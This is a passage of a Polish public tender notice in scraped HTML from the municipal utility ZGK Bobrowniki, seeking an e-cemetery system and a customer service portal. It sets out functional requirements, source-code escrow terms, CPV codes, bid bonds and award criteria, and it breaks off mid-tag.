realizacji do 31.12.2017 r.Szczegółowy opis wymagań w ramach zadania zawarty jest w Załączniku nr 1 - Zadanie 3. Zadanie nr 4Wdrożenie usługi-e-cmentarzCel i założenia:Zakup dostawa, instalacja, wdrożenie i uruchomienie niezbędnego oprogramowania specjalistycznego w dziedzinie obsługi i zarządzania cmentarzami dla realizacji e-usługi.Wymagane jest przekazanie kodów źródłowych oprogramowania wytworzonego przez Wykonawcę w formatach powszechnie dostępnych a w tym:d)	kody źródłowe bazy danych;e)	kody oprogramowania głównego; f)	opisaną strukturę tabel oraz powiązania między nimi.Przy czym nie obejmuje to oprogramowania niezbędnego a pochodzącego od producentów zewnętrznych co do których Wykonawca nie posiada praw autorskich lub z powodu innych uwarunkowań prawnych nie może ich przekazać. W takich sytuacjach dopuszcza się, że Wykonawca wskaże miejsce depozytu kodów źródłowych z uprawnieniem Zamawiającego do dostępu i korzystania z tychże kodów w określonych sytuacjach a to:e)	w przypadku upadłości lub likwidacji dostawy oprogramowania;f)	w przypadku odmowy świadczenia serwisu lub usług utrzymaniowych przez dostawcę Oprogramowania;g)	w przypadku wady Oprogramowania, której nie chce usunąć dostawca oprogramowania;h)	w przypadku zmiany warunków świadczenia usług serwisowych lub utrzymaniowych ponad ustalone dopuszczalne zmiany.Dopuszcza się złożenie kodów źródłowych do depozytu notarialnego, skrytki bankowej lub w firmie profesjonalnie zajmującej się świadczeniem deponowania kodów źródłowych. Wymagany system winien oferować podstawowe funkcje wspomagające zarządzanie cmentarzem a które będą jednocześnie służyły przygotowaniu, przetworzeniu i udostępnianiuw ramach i na rzecz planowanej e-usługi publicznej. Podstawowe funkcje to :1.	Ewidencja, uporządkowanie i udostępnianie danych dotyczących osób pochowanych na cmentarzu i opiekunów grobów.2.	Utworzenie ksiąg zmarłych - wprowadzenie danych do aplikacji, w wyniku spisu z natury tj. danych z nagrobków i wpisania danych z ksiąg zmarłych oraz innych dokumentów ewidencyjnych będących w posiadaniu administracji cmentarzy w zakresie ilościowym do 4000 kwater w obu cmentarzach.3.	Wykonanie i opracowanie szczegółowej mapy cmentarzy w postaci graficznej wraz ze współrzędnymi geodezyjnymi kwater i lokalizacja GPS.4.	Zbudowanie mapy komputerowej cmentarzy zawierającej obrys i kształt cmentarza, oznaczenia sektorów, rzędów numerów grobów, aleje, pojedyncze groby.5.	Określenie wolnych miejsc mogących być rezerwacjami lub stanowić wolne miejsca do zagospodarowania.6.	Oznaczenie na mapie cmentarzy rezerwacji widniejących w dokumentacji papierowej posiadanej przez Administratora (wraz z podaniem ich współrzędnych geodezyjnych oraz pozycji GPS).7.	Zaprojektowanie wolnej części cmentarzy i nadanie nowym miejscom grzebalnym oznaczeń miejscowych, celem dalszej bezbłędnej ewidencji. Określenie niezbędnych wymiarów tj. odległości pomiędzy grobami, odległości od ścieżek i innych istotnych elementów cmentarza.8.	Indywidualna kartoteka dla danego grobu.9.	Opracowanie dokumentacji fotograficznej grobów (co najmniej dwie fotografie w zbliżeniu i perspektywie) na zakończenie wdrożenia systemu e-usługi. 10.	Udostępnienie funkcji i danych lokalizacyjnych grobów zarówno w oparciu o dane GPS jak i współrzędne geodezyjne.11.	Udostępnienie możliwości wirtualnego spaceru po cmentarzach poprzez stronę www Zamawiającego.12.	Możliwość dodawania do kartoteki ewidencji zdjęć i filmów.Tak zgromadzone dane winny być podstawą do wykreowania i zdefiniowania i udostępniania nowej e-usługi opartej o :a)	raportowania zbliżającego się końca trwałości grobu dla zarejestrowanej uprawnionej osoby (np. członka rodziny);b)	obsługa czynności przedłużanie prawa do korzystania z miejsca pod groby murowane;c)	obsługa procedury opłaty za korzystanie z cmentarzy, którą pobiera zarządca w wysokości określonej przez obowiązujące aktualnie regulacje prawne.Wymagane jest dokonanie niezbędnej integracji z aktualnie eksploatowanym Systemem Informatycznym marki COMARCH ERP OPTIMA wspierającym zarządzanie firmą Zamawiającego.Integracja ta winna obejmować co najmniej :a)	wspólną i ujednoliconą bazę słownikową (normatywną),b)	wspólną i ujednoliconą Kartotekę Osobową,c)	wspólną i ujednoliconą bazę faktur i rozrachunków (faktura inicjowana w systemie e-usługi),d)	przepływ danych o rozrachunkach i rozliczeniach finansowych z obecnie eksploatowanego systemu COMARCH ERP OPTIMA do systemu e-usługi,e)	przepływ danych pomiędzy modułami obecnie eksploatowanego systemu do systemu e-usługi.Zamawiający wymaga i oczekuje współpracy z Wykonawcami pozostałych zadań w zakresie współdziałania oraz integracji sprzętu i oprogramowania celem osiągnięcia wspólnego rezultatu jakim jest spójny i integralny ,,Teleinformatyczny system pomiarowo- rozliczeniowy ZGK Bobrowniki".Termin realizacji do 30.09.2017 r.Szczegółowy opis wymagań w ramach zadania zawarty jest w Załączniku nr 1 - Zadanie 4. Zadanie nr 5Stworzenie elektronicznej platformy obsługi klienta Cel i założenia:Zakup, dostawa, instalacja, wdrożenie i uruchomienie niezbędnego oprogramowania dla realizacji usług e-woda i e-cmentarz - specjalizowany Portal oraz Elektroniczne Biuro Obsługi Klienta o nazwie roboczej zgk.bobrowniki.pl/EBOK przeznaczony do udostępniania i przetwarzania obu e-usług. Portal przeznaczony dla klientów Zamawiającego. Portal odgrywa fundamentalną rolę ponieważ decyduje o komfortowym dostępie do niezbędnych informacji i załatwienia spraw poprzez obie e-usługi. Jest to jeden z elementów wpływających na satysfakcję klienta. Zadowolenie klienta w ramach e-usług jest priorytetem dla Zamawiającego.Portal winien zostać stworzony zgodnie z zasadami użyteczności stron internetowych (Web-Usability) wg. których nawigacja po stronach Portalu dla Klienta powinna być prosta i intuicyjna.Oznacza to, że klient w intuicyjny sposób powinien móc odnaleźć interesujące go informacje i usługi. Oprogramowanie Portalu będzie również dostępne na platformach mobilnych, takich jak tablet lub smartfon.Portal i zaimplementowane w nim e-usługi czyli efekty projektu winny być dostępne powszechnymi kanałami komunikacji elektronicznej a w tym również założono i przewidziano korzystanie z usługi poprzez urządzenia mobilne np. takie jak tablety.Dzięki temu korzystanie z e-usług woda i cmentarz winno być możliwe niezależnie od miejsca przebywania klienta i wykorzystywanej technologii.Portal winien być wielojęzyczny (języki polski, angielski i niemiecki).Zastosowane interfejsy graficzne winny być przyjazne dla użytkownika. Generalnie planowany portal dla klientów musi się charakteryzować wysoka dostępnością i być zgodny ze standardami dostępności treści internetowych WCAG 2.0.Portal winien współdziałać z EPUAP2 poprzez jego bezpośrednie udostępnienie na Portalu jak i na rzecz e-usług. Przy czym portal i e-usługi winny obsługiwać równocześnie różne poziomy dojrzałości a to: ?	na poziomie dojrzałości 4/5 (transakcja / personalizacja) ?	na poziomie dojrzałości 3 (dwustronna interakcja) ?	na poziomie dojrzałości 1 (informacja).Wymagana obsługa z wykorzystaniem EPUAP2 w relacjach Zakład Gospodarki Komunalnej - Klient (mieszkaniec lub podmiot) w ramach e-usług.Wymagane jest przekazanie kodów źródłowych oprogramowania wytworzonego przez Wykonawcę w formatach powszechnie dostępnych a w tym:g)	kody źródłowe bazy danych;h)	kody oprogramowania głównego;i)	opisaną strukturę tabel oraz powiązania między nimi.Przy czym nie obejmuje to oprogramowania niezbędnego a pochodzącego od producentów zewnętrznych co do których Wykonawca nie posiada praw autorskich lub z powodu innych uwarunkowań prawnych nie może ich przekazać. W takich sytuacjach dopuszcza się, że Wykonawca wskaże miejsce depozytu kodów źródłowych z uprawnieniem Zamawiającego do dostępu i korzystania z tychże kodów w określonych sytuacjach a to:i)	w przypadku upadłości lub likwidacji dostawy oprogramowania;j)	w przypadku odmowy świadczenia serwisu lub usług utrzymaniowych przez dostawcę Oprogramowania;k)	w przypadku wady Oprogramowania, której nie chce usunąć dostawca oprogramowania;l)	w przypadku zmiany warunków świadczenia usług serwisowych lub utrzymaniowych ponad ustalone dopuszczalne zmiany.Dopuszcza się złożenie kodów źródłowych do depozytu notarialnego, skrytki bankowej lub w firmie profesjonalnie zajmującej się świadczeniem deponowania kodów źródłowych. Zamawiający wymaga i oczekuje współpracy z Wykonawcami pozostałych zadań w zakresie współdziałania oraz integracji sprzętu i oprogramowania celem osiągnięcia wspólnego rezultatu jakim jest spójny i integralny ,,Teleinformatyczny system pomiarowo- rozliczeniowy ZGK Bobrowniki".Termin realizacji do 31.12.2017 r.Szczegółowy opis wymagań w ramach zadania zawarty jest w Załączniku nr 1 - Zadanie nr 5. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">48620000-0</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213300-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30231300-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30237280-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>31224500-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32230000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32320000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32410000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32413100-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32420000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>35100000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44523300-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>48000000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>48710000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>48820000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>48620000-0</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">693800,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Tak</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Oferta musi być zabezpieczona wadium w wysokości:- w przypadku zadania nr 1 - 2 000,00 zł (słownie: dwa tysiące złotych)- w przypadku zadania nr 2 - 600,00 zł (słownie: sześćset złotych)- w przypadku zadania nr 3 - 10 000,00 zł (słownie: dziesięć tysięcy złotych)- w przypadku zadania nr 4 - 1 000,00 zł (słownie: jeden tysiąc złotych)- w przypadku zadania nr 5 - 3 000,00 zł (słownie: trzy tysiące złotych)</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena oferowana </TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>czas udzielonej gwarancji </TD><TD style='border: 1px solid black;border-collapse: collapse;'>25,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>czas rozpoczęcia naprawy serwisowej</TD><TD style='border: 1px solid black;border-collapse: collapse;'>15,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span 